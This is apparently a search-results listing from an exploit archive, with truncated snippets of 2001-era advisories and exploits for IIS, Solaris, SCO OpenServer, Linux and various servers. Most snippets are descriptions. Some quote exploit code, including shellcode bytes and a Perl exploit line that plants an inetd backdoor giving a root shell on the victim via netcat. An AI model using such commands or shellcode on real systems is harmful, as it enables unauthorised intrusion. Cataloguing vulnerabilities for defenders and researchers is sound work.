
2058 matches found

securityvulns
added 2001/06/18 12:0 a.m., 96 views

Buffer Overflow in GazTek HTTP Daemon v1.4 (ghttpd)

/ qitest1's security advisory 002 / Buffer Overflow in GazTek HTTP Daemon v1.4 ghttpd +Systems Affected Any system running GazTek HTTP Daemon v1.4 ghttpd +Program Description ghttpd is a small and easy to configure HTTP server with CGI support, tested on Linux. It can run as a standalone daemon o...

AI score: 1.2
Exploits: 0

exploitpack
added 2001/06/10 12:0 a.m., 12 views

TransSoft Broker FTP Server 3.04.04.75.x - CWD Buffer Overflow

TransSoft Broker FTP Server 3.04.04.75.x - CWD Buffer Overflow source: https://www.securityfocus.com/bid/2851/info Broker is a Windows FTP server from TransSoft. Versions of Broker are vulnerable to a denial of service. A CD or CWD command, argumented by an invalid '. .' dot-space-dot sequence ca...

AI score: 0.3
Exploits: 0

securityvulns
added 2001/06/07 12:0 a.m., 13 views

Buffer Overflow in TIAtunnel-0.9alpha2

/ qitest1's security advisory 001 / Buffer Overflow in TIAtunnel-0.9alpha2 +Systems Affected Any system running TIAtunnel-0.9alpha2 +Program Description TIAtunnel is a simple IRC bouncer that allows access from a simple IPv4 box to any kind of well-known server. It has been written by tHE rECIdjV...

AI score: 1.9
Exploits: 0

exploitpack
added 2001/06/07 12:0 a.m., 11 views

Microsoft Windows Server 2000 - Telnet Username Denial of Service

Microsoft Windows Server 2000 - Telnet Username Denial of Service source: https://www.securityfocus.com/bid/2838/info Due to a flaw in the implementation of the telnet service, it is possible for a remote client to perform a denial of service attack against a host. If approximately 4300 character...

AI score: 7.3
Exploits: 0

Exploit DB
added 2001/05/08 12:0 a.m., 40 views

Microsoft Windows Server 2000 SP1/SP2 - isapi .printer Extension Overflow (2)

/ IIS 5 remote .printer overflow. "jill.c" don't ask. by: dark spyrit respect to eeye for finding this one - nice work. shouts to halvar, neofight and the beavuh bitchez. this exploit overwrites an exception frame to control eip and get to our code.. the code then locates the pointer to our large...

AI score: 7
Exploits: 0

exploitpack
added 2001/04/29 12:0 a.m., 24 views

NullSoft Winamp 2.x - AIP Buffer Overflow

NullSoft Winamp 2.x - AIP Buffer Overflow // source: https://www.securityfocus.com/bid/2680/info Winamp is a popular media player supporting MP3 and other filetypes. Versions of Winamp are vulnerable to a buffer overflow condition triggered during processing of Audiosoft parameter files .AIP. A...

AI score: 0.7
Exploits: 0

exploitpack
added 2001/04/09 12:0 a.m., 15 views

Solaris 7/8 - kcms_configure Command-Line Buffer Overflow (1)

Solaris 78 - kcmsconfigure Command-Line Buffer Overflow 1 // source: https://www.securityfocus.com/bid/2558/info The Kodak Color Management System, or KCMS, is a package that ships with workstation installations of Solaris 7 and 8. kcmsconfigure, a part of KCMS, is vulnerable to a buffer overflow...

AI score: 0.9
Exploits: 0

exploitpack
added 2001/03/27 12:0 a.m., 12 views

Linux Kernel 2.2.18 (RedHat 6.27.0 2.2.142.2.182.2.18ow4) - ptraceexecve Race Condition Privilege Escalation (1)

Linux Kernel 2.2.18 RedHat 6.27.0 2.2.142.2.182.2.18ow4 - ptraceexecve Race Condition Privilege Escalation 1 / EDB Note: Updated exploit can be found here: https://www.exploit-db.com/exploits/20721/ source: https://www.securityfocus.com/bid/2529/info The Linux kernel is the core of all...

AI score: 0.3
Exploits: 0

exploitpack
added 2001/03/08 12:0 a.m., 13 views

Microsoft IIS 5.0 - WebDAV Denial of Service

Microsoft IIS 5.0 - WebDAV Denial of Service source: https://www.securityfocus.com/bid/2453/info Microsoft IIS is subject to a denial of service condition. WebDAV contains a flaw in the handling of certain malformed requests, submitting multiple malformed WebDAV requests could cause the server to...

AI score: 7.3
Exploits: 0

Exploit DB
added 2001/03/08 12:0 a.m., 24 views

Microsoft IIS 5.0 - WebDAV Denial of Service

source: https://www.securityfocus.com/bid/2453/info Microsoft IIS is subject to a denial of service condition. WebDAV contains a flaw in the handling of certain malformed requests, submitting multiple malformed WebDAV requests could cause the server to stop responding. This vulnerability is also...

AI score: 7
Exploits: 0

securityvulns
added 2001/02/21 12:0 a.m., 23 views

Quick Analysis of the recent crc32 ssh(d) bug

Abstract ----------- This article discusses the recently discovered security hole in the crc32 attack detector as found in common ssh packages like OpenSSH and derivatives using the ssh-1 protocol. There is a possible overflow during assignment from 32bit integer to 16bit wide one leading to...

AI score: 7.8
Exploits: 0

Exploit DB
added 2001/01/27 12:0 a.m., 46 views

Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Command Execution

!/usr/bin/perl Remote sploit for Netscape Enterprise Server 4.0/sparc/SunOS 5.7 usage: ns-shtml.pl 'command line' | nc victim port Sometimes server may hang or coredump.. eek ;- [email protected] $cmdline="echo 'ingreslock stream tcp nowait root /bin/sh sh -i' /tmp/bob; /usr/sbin/inetd -s...

AI score: 7
Exploits: 0

Exploit DB
added 2001/01/26 12:0 a.m., 42 views

SCO OpenServer 5.0.5 - Env Local Stack Overflow

/ Copyright c 2000 ADM / / All Rights Reserved / / THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM / / The copyright notice above does not evidence any / / actual or intended publication of such source code. / / / / Title: SCO OpenServer mscreen / / Tested under: SCO OpenServer 5.0.5 / / By: K...

AI score: 7
Exploits: 0

exploitpack
added 2001/01/26 12:0 a.m., 11 views

SCO OpenServer 5.0.5 - Env Local Stack Overflow

SCO OpenServer 5.0.5 - Env Local Stack Overflow / Copyright c 2000 ADM / / All Rights Reserved / / THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM / / The copyright notice above does not evidence any / / actual or intended publication of such source code. / / / / Title: SCO OpenServer mscreen ...

AI score: 0.6
Exploits: 0

0day.today
added 2001/01/26 12:0 a.m., 18 views

SCO OpenServer 5.0.5 Env Local Stack Overflow Exploit

Exploit for sco platform in category local exploits ===================================================== SCO OpenServer 5.0.5 Env Local Stack Overflow Exploit ===================================================== / Copyright c 2000 ADM / / All Rights Reserved / / THIS IS UNPUBLISHED PROPRIETARY...

AI score: 6.8
Exploits: 0

exploitpack
added 2001/01/25 12:0 a.m., 24 views

Solaris 2.6/2.7 - /usr/bin/write Local Overflow

Solaris 2.62.7 - usrbinwrite Local Overflow include include / /usr/bin/write overflow proof of conecpt. Tested on Solaris 7 x86 Pablo Sor, Buenos Aires, Argentina. 01/2000 [email protected] usage: write-exp shelloffset retaddroffset default offset should work. / long getesp asm"movl %esp,%eax"; ch...

AI score: 0.7
Exploits: 0

securityvulns
added 2001/01/17 12:0 a.m., 38 views

Solaris /usr/bin/write Vulnerability

I have written an exploit for the /usr/bin/write command, this is not a new vulnerability but it has not been fixed at least till Solaris 7 patches, don't know about Solaris 8. This command contains a buffer overflow in the second argument. If this data exceeds predefined length, inserting two valu...

AI score: 1.1
Exploits: 0

exploitpack
added 2001/01/15 12:0 a.m., 13 views

APC UPS 3.7.2 - apcupsd Local Denial of Service

APC UPS 3.7.2 - apcupsd Local Denial of Service / Local Denial of Service for any linux box running APCUPSD v3.7.2 APCUPSD has his pid file world writeable, therefore it is possible to let it kill another pid and create a denial of service against any running daemon. when the apcupsd is stopped,...

AI score: 7.3
Exploits: 0

exploitpack
added 2001/01/15 12:0 a.m., 12 views

Solaris 7/8-beta - ARP Local Overflow

Solaris 78-beta - ARP Local Overflow / arp overflow proof of concept by [email protected] shellcode originally written by Cheez Whiz. tested on x86 solaris 7,8beta default should work. if not, arg1 = offset. +- by 100's Copyright Security-Focus.com, 11/2000 / long getesp asm"movl %esp,%eax"...

AI score: 0.3
Exploits: 0

Exploit DB
added 2001/01/13 12:0 a.m., 39 views

Solaris 2.5/2.5.1 - 'getgrnam()' Local Overflow

include include / getgrnam function overflow. works against Solaris 2.5/2.5.1 SPARC default offset should work. Pablo Sor, Buenos Aires, Argentina. [email protected] / uchar shell = "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"...

AI score: 7
Exploits: 0